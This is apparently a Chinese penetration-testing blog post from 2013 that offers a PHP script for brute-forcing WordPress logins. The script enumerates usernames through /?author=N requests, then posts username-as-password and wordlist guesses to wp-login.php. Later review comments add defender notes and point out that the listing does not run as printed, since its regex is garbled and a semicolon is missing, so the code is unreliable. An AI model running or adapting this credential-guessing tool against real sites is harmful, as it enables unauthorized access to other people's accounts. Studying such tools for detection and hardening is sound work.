跑wordpress用户密码脚本


跑wordpress用户密码脚本

2013/09/17 15:04 | 瞌睡龙

在做渗透测试的时候,有时候会遇到一个wordpress博客,如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。

大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢,下次发包还是调用命令结合hydra来爆破。

原理是通过 URL /?author= 遍历获取用户名,然后先跑用户名与密码相同的用户,再调用同目录下 pass.txt 中的密码文件进行爆破。

默认获取前10个用户,可自行修改。

使用方法: php wordpress.php http://www.test.com


<?php
/*
 * Scraped listing of a WordPress credential-testing script. Two passes:
 *   1. GET /?author=1 .. /?author=10 on the base URL given in $argv[1] and
 *      pull one name out of every non-404 response with preg_match();
 *   2. POST each name to /wp-login.php, first with password == username,
 *      then with every line of ./pass.txt, printing a "name password" pair
 *      whenever the response body lacks the 'div id="login_error"' marker.
 *
 * Defender notes (what this looks like on the wire): a short burst of
 * sequential /?author=N GETs from one client, followed by many POSTs to
 * wp-login.php that all carry the same redirect_to, testcookie=1 and the
 * fixed wp-submit value seen below, with no cookies between requests.
 * Suppressing author-archive enumeration, rate limiting or lockout on
 * wp-login.php, and MFA each break one of the two passes.
 *
 * NOTE(review): the listing as scraped does not parse — $pattern below lost
 * its HTML tags to extraction, and a later `return 404` has no terminating
 * semicolon. The code is kept exactly as published; only comments were added.
 */
set_time_limit(0); // no execution time limit: the wordlist pass can run for a long time
$domain = $argv[1]; // base URL taken verbatim from the first CLI argument; no validation, no trailing-slash handling
// Pass 1: author-ID enumeration. Only IDs 1..10 are tried (hard-coded bound).
// presumably relies on WordPress answering /?author=N for an existing user and
// on httprequest() following the redirect to the author archive — TODO confirm
for ($i=1; $i <= 10; $i++) {
    $url = $domain . "/?author=" . $i;
    $response = httprequest($url,0); // 0 => GET; returns the body, or the int 404 sentinel
    if ($response == 404) { // loose == against the int sentinel returned by httprequest()
        continue;
    }
    $pattern = "{(./*) |}"; // NOTE(review): garbled by HTML extraction — the pattern as printed is not the one the author ran
    preg_match($pattern, $response, $name);
    $namearray[] = $name[1]; // $namearray is never initialised; with zero hits count() below runs on an undefined variable
}
echo "共获取用户" . count($namearray). "名用户\n";
echo "正在破解用户名与密码相同的用户:\n";
$crackname = crackpassword($namearray, "same"); // pass 2a: password == username; returns the names that got through
$passwords = file("pass.txt"); // wordlist next to the script, one candidate per line, loaded wholesale into memory
echo "正在破解弱口令用户:\n";
if ($crackname) {
    $namearray = array_diff($namearray, $crackname); // skip names already reported by pass 2a
}
crackpassword($namearray, $passwords); // pass 2b: wordlist; return value ignored

/*
 * Submit login attempts to $domain/wp-login.php for every entry of $namearray.
 *
 * $passwords  the literal string "same" (try password == username) or an
 *             array of candidate passwords.
 * Returns     in "same" mode the names whose attempt succeeded (as an array
 *             built from the "" initial value); in array mode always "".
 *
 * "Success" is only the absence of 'div id="login_error"' in the followed
 * response: any page other than the login form with an error — including a
 * lockout, captcha or WAF block page — is counted as a hit.
 */
function crackpassword($namearray, $passwords){
    global $domain;
    $crackname = ""; // initialised as "" rather than array(); the $crackname[] below relies on string-to-array conversion — TODO confirm on the PHP version in use
    foreach ($namearray as $name) {
        $url = $domain . "/wp-login.php";
        if ($passwords == "same") { // loose ==: an array is never == a string, so array input always takes the else branch
            // Same field set the stock login form submits; wp-submit is the
            // URL-encoded label "登录", a fixed value that fingerprints this script.
            $post = "log=" .urlencode($name). "&pwd=" .urlencode($name). "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=" .urlencode($domain). "%2Fwp-admin%2F&testcookie=1";
            $pos = strpos(httprequest($url, $post), 'div id="login_error"');
            if ($pos === false) { // marker absent => treated as a successful login
                echo "$name $name" . "\n";
                $crackname[] = $name;
            }
        }
        else {
            foreach ($passwords as $pass) { // one POST per (name, candidate); no delay, no lockout handling
                $post = "log=" .urlencode($name). "&pwd=" .urlencode($pass). "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=" .urlencode($domain). "%2Fwp-admin%2F&testcookie=1";
                $pos = strpos(httprequest($url, $post), 'div id="login_error"');
                if ($pos === false) { // same absence-of-marker check as above
                    echo "$name $pass" . "\n";
                }
            }
        }
    }
    return $crackname;
}

/*
 * One cURL request. $post falsy => GET; otherwise $post is sent verbatim as
 * the POST body. No cookie jar is configured, so every call is independent.
 *
 * Returns the response body after redirects, or the int 404 when the final
 * status is 404. A transport failure yields curl_exec()'s false, which the
 * callers do not distinguish from a body.
 */
function httprequest($url, $post){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // hand the body back from curl_exec() instead of printing it
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // TLS certificate verification disabled: any certificate is accepted
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); // follow 30x, so callers see the final page rather than the redirect
    if ($post){
        curl_setopt($ch, CURLOPT_POST, 1);
        // submit via POST
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $output = curl_exec($ch);
    $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE); // status of the last response in the redirect chain
    curl_close($ch);
    if ($httpcode == 404) {
        return 404 // NOTE(review): no semicolon in the published listing; left as printed
    }
    else {
        return $output;
    }
}
?>